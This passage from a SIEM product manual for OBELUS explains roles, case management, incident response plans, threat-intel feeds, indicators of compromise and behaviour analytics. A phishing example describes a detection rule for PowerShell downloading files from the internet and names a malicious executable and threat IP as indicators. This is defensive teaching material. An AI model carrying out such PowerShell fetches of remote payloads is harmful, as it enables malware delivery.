Delete Rules Permission to delete Rules
Add Events Permission to add Events
Update Events Permission to update Events
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 37
View Events Permission to view Events
Delete Events Permission to delete Events
Manage Field Extraction Rules Permission to Create/View/Update/Delete Log Parsers
Add Asset Permission to add Asset
View Asset Permission to view Asset
Update Asset Permission to update Asset
Delete Asset Permission to delete Asset
Enable/Disable Agents Permission to enable/disable Agents
Add Organization Permission to add Organization
Update Organization Permission to update Organization
Delete Organization Permission to delete Organization
View Organization Permission to view Organization
Create Case Permission to Create Case
View Case Permission to View Case
Update Case Permission to Update Case
Reopen Case Permission to Reopen Case
Create Global Space Permission to Create Public Space
View Global Space Permission to View Public Space
Update Global Space Permission to Update Public Space
Delete Global Space Permission to Delete Public Space
Promote Space Permission to Promote Space from private to public
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 38
Create Role
1. Go to Settings > Users & Authentication > Manage Users 2. Click on Roles tab. You can see list of Roles under your Organizations
Figure 25: Manage Users create role
3. Click on New Roles
Figure 26: Create Role
4. Enter Role name, select permissions from left side 5. Select Granted To either Users to Groups 6. Select list of users or groups to add to that role
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 39
7. Click on save button to persist changes
Create Users
1. Go to Settings > Users & Authentication > Manage Users 2. Click on Users tab 3. Click on New User button and enter Email, First Name, Middle Name, Last Name, Default Company and Assign Company. 4. Click on Save Changes button to persist changes
Edit Users
1. Go to Settings > Users & Authentication > Manage Users 2. Click on edit link from user table 3. Edit the first name, last name and company details. 4. Click on save changes button to persist changes.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 40
Incident Response Plan
OBELUS comes with Inbuilt Incident Response Plans to help Security Analyst respond to cyber threats faster and more
efficient. These platforms also allow you to customize and edit the response plan according to requirements.
1. Login with Valid Username & Password 2. Click on the settings option right side 3. Select Incident Response Plan from left panel
Figure 27: Incident Response Plan
4. To create a new IRP plan click on “New IRP” or Select the dotted option to View, Clone or Edit existing one. 5. Use the right and left panel to create the template, flow, design, colour etc and save your work.
Figure 28: Incident Response Plan
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 41
Case Management
Our Case Management platform is fully integrated into Advanced Analytics enabling you to optimize and document analysis and
artifacts. This also allows Analysts in collecting, distributing and analyzing security alerts which are associated with events or
incidents more effectively and efficiently thus helping in closing incident investigation with right data, artifacts and analysis.
1. Login with Valid Username & Password
2. Click on the “Cases” search tab on the header bar
3. View the cases by time, status, age and priority
4. To open a case, select the case and click in “Case Title”
Creating a case for incident: 1. Analysts can create case for incidents that needs further investigation directly from Alert Tab.
2. Select the alert and click on “Add to Case” option at your right.
Figure 30: Add Alert to Case
Figure 29: Cases Dashboard.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 42
3. You can add the alert to existing case or create a new case.
Figure 31: Create New Case
4. Or create a new case by filling case details.
5. Once case is created click on the “Cases tab” to view your case and Click on “Case Title” to open the case.
6. You can view the Case Details, Age, Evidence, IRP, Alerts, Assignee, Owner, Attachment etc on the page.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 43
Figure 32: Case Detail Page
7. Every Alert/case has IRP (Incident Response associated with it) which helps analyst to investigate incident
effectively and efficiently.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 44
Investigation Graph
Investigation Graph helps Analysts to triage/analyze the alerts with click of nodes using the graph built using correlated
information and threat context. Below is one such scenario explained to showcase how this feature helps to analyze the alert.
Use Case: Phishing E-Mail
Phishing is a type of online scam where attackers send an email that appears to be from a legitimate company and ask you to
provide sensitive information. This is usually done by including a link that will appear to take you to the company’s website to
fill in your information – but the website is a clever fake and the information you provide goes straight to the crooks behind the
scam.
The term ’phishing’ is a spin on the word fishing, because criminals are dangling a fake ’lure’ (the email that looks legitimate, as
well as the website that looks legitimate) hoping users will ’bite’ by providing the information the criminals have requested –
such as credit card numbers, account numbers, passwords, usernames, and more.
Attack Execution Below are the steps how this attack will be executed:
• User receives an email that has a link in it.
• User clicks the link.
• User connects to the URL with default browser
• Other actions are performed (file download, running malicious code).
Configure Events Following events were created to detect this kind of attack.
• Email Download by PowerShell (Which will check if any content was downloaded from PowerShell Exe)
• Network Connection (Establishes network connection from process)
• File Created (Monitories any new file was created)
• File Create Stream (It generates events that log the hash of the contents of the file to which the stream is assigned)
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 45
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 46
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 47
Configured Notable Events/ Rules The following notable event was created to detected phishing use case. This rule will check for any PowerShell command process
run to download any file from internet, preceded by network connection, preceded by file creation. If all conditions met, then
it will raise alert.
Investigation for Alert 1. Analysts can create investigation for incidents that needs further investigation directly from Alert Tab.
2. Select the alert and click on “Add to Investigation” option at your right.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 48
Figure 33: Investigation Graph
3. You can add alert to the investigation by filling case details.
Figure 34: Configure New Investigation
4. Select the investigation created from the “Investigation Tab”.
5. The investigation shows the attacker path and what actions a particular adversary performed.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 49
6. Right Panel displays the Indicators and Observables.
Figure 35: Investigation Graph
The above attacker path clearly mentions that 65536.exe file was downloaded from PowerShell and from 101.99.77.132 IP
which was Threat IP from threat Intel sources. This graph was clearly gives the information about threat IP and any passive dns
were attached to IP or any malware hashes are associated to this IP.
If you Click on any indicator, it will tell you the Geo Location, IP reputation and WHO IS
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 50
Report Generation Tool
Generate reports based in the requirements and business needs, Inbuilt reports helps users and analyst save time and generated
On-Demand and customize the template as per the requirement.
1. Login with Valid Username &Password 2. Click on the “Reports” tab on the header bar 3. Click on the “Create Report Template”
4. Enter the following info to create Report in Report Template and select compliance type from drop down 5. Scroll down the window to give Graphs & Filter Condition 6. Click on Create button, So Created report will be saved 7. To Generate the Report for Preview, Click on Generate Report button 8. To take Printout of Report Click on Print button
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 51
Figure 36: OBELUS SIEM Sample Report.
9. To edit the report, Click on Edit Report option
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 52
10. Click on Schedule Reports to schedule
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 53
Threat Intelligence
The Threat Intelligence framework is a mechanism for consuming and managing threat feeds, detecting threats, and alerting.
The framework consists of modular inputs that collect and sanitize threat intelligence data, lookup generation searches to
reduce data to optimize performance, searches to correlate data and alert on the results, and data modeling to accelerate and
store results. This framework also includes a number of audit dashboards that allow introspection into threat intelligence
retrieval, normalization, persistence, and analysis.
What OSINT: OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free, public
sources about an individual or organization. In practice, that tends to mean information found on the internet, but technically
any public information falls into the category of OSINT whether it’s books or reports in a public library, articles in a newspaper
or statements in a press release.
Why OSINT:
By gathering publicly available sources of information about a particular target an attacker – or friendly penetration tester –
can profile a potential victim to better understand its characteristics and to narrow down the search area for possible vulnerabilities.
Without actively engaging the target, the attacker can use the intelligence produced to build a threat model and develop a plan of
attack. Targeted cyber-attacks, like military attacks, begin with reconnaissance, and the first stage of digital reconnaissance is passively
acquiring intelligence without alerting the target.
Gathering OSINT on yourself or your business is also a great way to understand what information you are gifting potential attackers.
Once you are aware of what kind of Intel can be gathered about you from public sources, you can use this to help you or your security
team develop better defensive strategies. What vulnerabilities does your public information expose? What can an attacker learn that
they might leverage in a social engineering or phishing attack?
Configured OSINT Feed: These are the configured OSINT feeds in OBELUS
Feed Name Feed Type Indicator Type
abuseFree_zeustrackerdomain URL DOMAIN
abuseFree_zeustrackerDOMAIN_domain URL DOMAIN
banjori-domlist URL DOMAIN
botvrij.eu URL DOMAIN
dshield.org URL DOMAIN
dshield.org_domain URL DOMAIN
gist.githubusercontent_domain URL DOMAIN
malc0de.com_domain URL DOMAIN
malwaredomainlist_domain URL DOMAIN
ransomwaretracker_domain URL DOMAIN
abuseFree_zeustrackerIP_ip URL IP
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 54
bambenekconsulting-ip URL IP
binarydefense-ip URL IP
dan.me.uk_ip URL IP
danger.rulez.sk_ip URL IP
emergingthreats-ip URL IP
feodotracker.abuse.ch_ip URL IP
lists.blocklist.de URL IP
New Feed URL IP
sblam.com-ip URL IP
spamhaus_DROP_ip URL IP
spamhaus_DROPV6_ip URL IP
spamhaus_EDROP_ip URL IP
threatcrowd-ip URL IP
extra feed API SHA1
openphis_url URL URL
vxvault_url URL URL
The Following steps to view create and update feeds.
Create Threat Feed: 1. Go to Manage Data > Settings >Feeds > Manage Feeds.
2. Click on Configure Feed.
3. Select the owner of the feed.
4. Enter Feed name
5. Select indicator type
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 55
6. Select type feed like URL, API, FILE, and TAXII. This will tell you source of the feed.
7. Click on Next Button.
8. Enter the URL of the feed.
9. Enter Feed trust score. It will tell level of trust that given to feed.
10. Enter Unique Source Name
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 56
11. Enter Delimiter like CSV, json
12. Select Feed scheduler frequency like run for everyone hour or s0
13. Click on the Next Button.
14. Enter tags for unique identification.
15. Select TLP.
16. Click on save button to persist changes.
Edit Threat Feed: 1. Go to Manage Data > Settings >Feeds > Manage Feeds.
2. Click on edit button from table that you want edit Feed.
3. Change the owner, Feed Name, Indicator and Feed Type.
4. Change the URL if you needed.
5. Change the Feed Trust Score, Source Name
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 57
6. Click on next button to change tags or TLP
7. Click on save button to persist changes.
Delete Threat Feed: 1. Go to Manage Data > Settings >Feeds > Manage Feeds.
2. Click on Delete button from table that you want Delete Feed
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 58
Manage Indicator of Compromise...
What Are Indicators of Compromise (IOC): Indicators of Compromise (IOC) are pieces of forensic data, such as data found in system log entries or files that identify
potentially malicious activity on a system or network.
Examples of an IOC include unusual network traffic, unusual privileged user account activity, login anomalies, increases in
database read volume, suspicious registry or system file changes, unusual DNS requests and Web traffic showing non-human
behavior. These and other unusual activities allow security teams monitoring the systems and networks to spot malicious
actors earlier in the intrusion detection process.
Documenting IOC and their associated threats allows the industry to share this information and improve incident response
and computer forensics. For this reason, efforts are being made by groups like OpenIOC, STIX and TAXII among others to
standardize IOC documentation and reporting.
The following steps to create/update/upload IOC’s.
Create Indicator: 1. Go to Manage Data > Settings >Feeds > Indicators.
2. Feed Name, Type, First Seen, Last Seen, Feed Source, Indicator, Status
3. Click on Create Button
4. Select Type (Whitelist/Blocklist)
5. Select Indicator Type (IP, Domain,Hash,Email)
6. Enter indicator value
7. Enter Feed trust score
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 59
8. Enter Reason.
9. Click on save button to persist changes.
Whitelisting: In more and more environments, IOC's are used as a blacklist system and security tools can block access to resources based on
the IP addresses, domains, file hashes, etc). But all security control implements also “Whitelist” systems to prevent (as much
as possible) false positives
IP Whitelisting:
IP Whitelisting allows you to create lists of trusted IP addresses or IP ranges from which your users can access your domains.
IP Whitelist is a security feature often used for limiting and controlling access only to trusted users. IP Whitelisting can be set
via Good Data API
Bulk White/Blocklist Indicator:
1. Go to Manage Data > Settings >Feeds > Indicators
2. Select the indicators that you want white or block list indicators
3. Click on the White or block list button
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 60
Bulk Upload Indicator: 1. Go to Manage Data > Settings >Feeds > Indicators
2. Click on the Add file button and upload the csv file to upload.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 61
Threat Intel Dashboard
Threat Hunting
Threat hunting is the practice of proactively searching for cyber threats that are lurking undetected in a network. Cyber threat
hunting digs deep to find malicious actors in your environment that have slipped past your initial endpoint security defenses.
After sneaking in, an attacker can stealthily remain in a network for months as they quietly collect data, look for confidential
material, or obtain login credentials that will allow them to move laterally across the environment.
Once an adversary is successful in evading detection and an attack has penetrated an organization’s defenses, many
organizations lack the advanced detection capabilities needed to stop the advanced persistent threats from remaining in the
network. That’s why threat hunting is an essential component of any defense strategy.
Threat Hunting Methodologies: Threat hunters assume that adversaries are already in the system, and they initiate investigation to find unusual behavior that
may indicate the presence of malicious activity. In proactive threat hunting, this initiation of investigation typically falls into
three main categories:
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 62
Hypothesis-driven investigation: Hypothesis-driven investigations are often triggered by a new threat that’s been identified through a large pool of crowd
sourced attack data, giving insights into attackers’ latest tactics, techniques, and procedures (TTP). Once a new TTP has been
identified, threat hunters will then look to discover if the attacker’s specific behaviors are found in their own environment.
Investigation based on known Indicators of Compromise or Indicators of Attack: This approach to threat hunting involves leveraging tactical threat intelligence to catalog known IOCs and IOAs associated with
new threats. These then become triggers that threat hunters use to uncover potential hidden attacks or ongoing malicious
activity.
Advanced analytics and machine learning investigations: The third approach combines powerful data analysis and machine learning to sift through a massive amount of information in
order to detect irregularities that may suggest potential malicious activity. These anomalies become hunting leads that are
investigated by skilled analysts to identify stealthy threats.
OBELUS will preconfigure with all Miter Based Tactics and Techniques which will be used for threat Hunting.
Historic Log Search
OBELUS SIEM allows searching, viewing and interacting with the logs, as well as performing data analysis and visualizing the logs
in a variety of charts, tables and maps. Analyst can search logs faster and more effectively without having to write complex
query statements.
1. Login with Valid Username &Password 2. Click on the “Historical” search tab on the header bar
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 63
3. Select “Time range” option and choose the duration of your search on right corner 4. Select the Add a filter option and provide value to be search and hit search option 5. Add fields and drill down you result to investigate further 6. User “Auto Refresh” option to set your current window refreshes time 7. To clear search click “New”, “Clear Query” or “Delete Filter”
1. Save search and share reports of trend or logs.
Figure 37: Historic Log search.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 64
UBA User behavior analytics (UBA) is the tracking, collecting and assessing of user data and activities using monitoring systems.
UBA technologies analyze historical data logs -- including network and authentication logs collected and stored in log
management and SIEM. UBA systems are primarily intended to provide cyber security teams with actionable insights.
OBELUS UBA Platform Identify security incidents using statistical analysis and predefined correlation rules. UBA can detect suspicious behavior with
no predefined patterns or rules.
OBELUS UBA Platform effectively addresses all of the top 10 security use cases described below:
1. Compromised User Credentials
User account credentials are keys to legitimate access, and stolen credentials are the number one vector for data
breaches.
2. Privileged-user Compromise
A privileged user has authorized access to high-value resources, such as a sensitive data or an authentication
system. When a hacker obtains privileged-user credentials, the attack can directly exploit high-value assets.
3. Executive Assets Monitoring
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 65
Monitoring activities on the executive computing assets such as the CEO’s or CFO’s laptop and help in building
asset and behavior models to identify unusual activities.
4. Compromised System/Host/Device Detection
It is very common for attackers to take control of systems, hosts or devices within an organizational network. The
UBA platform helps monitor several vectors, including user accounts; servers; network devices, non-trusted
communication sources, insecure protocols, and other signs of malicious behavior.
5. Insider Access Abuse
Detect when a user (privileged or not) is performing risky activities that are outside of their normal baseline.
6. Lateral Movement Detection
Behavioral analysis to connect the dots between “unrelated” activities such as privilege escalation, suspicious
security rights for normal user account.
7. Data Exfiltration Detection
Data exfiltration happens when sensitive data is illicitly transferred outside an organization. UBA monitors for
unusual amounts of network traffic over protocols that facilitate large data transfer compared to the baseline of a
user or machine transferring the data.
8. Account Lockouts
An account lockout disallows access to a user. This security feature aims to protect an account from anyone or
anything trying to guess the username and password.UBA use case helps to automate the risk assessment process
and quickly notify on account risk.
9. Service Account Misuse
A service account is used instead of a normal system account to run specific application services. By employing its
behavioral analytics capabilities, The UBA solution will automatically identify service accounts and notify any
abnormal behavior.
10. Security Alert Investigation
UBA Dashboard and Real-time alert can dramatically improve the productivity of SOC analysts along with modern
security information and event management solution such as OBELUS, OBELUS uses machine-built timelines to
offer a better interface for threat hunting, Investigation and Incident Response Plan.
Create Use Case for Successful User Logon attempts:
1. Refer Log-On-boarding for shipping logs.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 66
2. Go to Manage Data > Settings > New Events > Events > Right click for New Event
3. New Events > Notables Events > Right click for New Event
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 67
4. If the notable correlation filters condition matches with event fields then alert will be triggered.
5. Go to Manage Widget > Click New Widget > Enter Title & Choose the Events, Rules, Alerts, Cases > Click Preview. 6. Drag and drop required Fields > Select Widget type > Click on Preview.
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 68
7. Click on the Submit button to save widget. 8. Go to Dashboards page >Right click for New Dashboard > Click on Edit Icon > Click Add icon to add Various Widgets.
9. UBA Dashboard
All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 69
For queries and support:
India:Hi-Tech City Main Road, Gachibowli,Hyderabad 500032
USA: 4 Beacon Way, Jersey City, New Jersey, USA 07304
Contact/Email: +91 8309506180 [email protected]